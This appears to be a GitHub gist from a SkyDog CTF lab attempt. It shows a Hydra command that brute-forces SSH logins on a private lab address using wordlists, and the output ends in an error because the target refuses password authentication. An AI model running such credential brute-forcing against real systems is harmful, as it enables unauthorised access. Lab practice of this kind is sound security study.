Created
August 20, 2017 05:09
-
-
Save awesomeaakash/3d698660bc6bef3d565dc880d70dde2a to your computer and use it in GitHub Desktop.
hydra ssh bruteforce skydog ctf 1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| hydra -t 5 -V -f -L usernames.txt -P passwords.txt ssh://192.168.56.131:22 | |
| Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. | |
| Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-19 00:31:59 | |
| [DATA] max 5 tasks per 1 server, overall 64 tasks, 812 login tries (l:29/p:28), ~2 tries per task | |
| [DATA] attacking service ssh on port 22 | |
| [ERROR] target ssh://192.168.56.131:22/ does not support password authentication. | |
| When i used it then i saw error. I also googled it but failed. So now lets see msfconsole |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment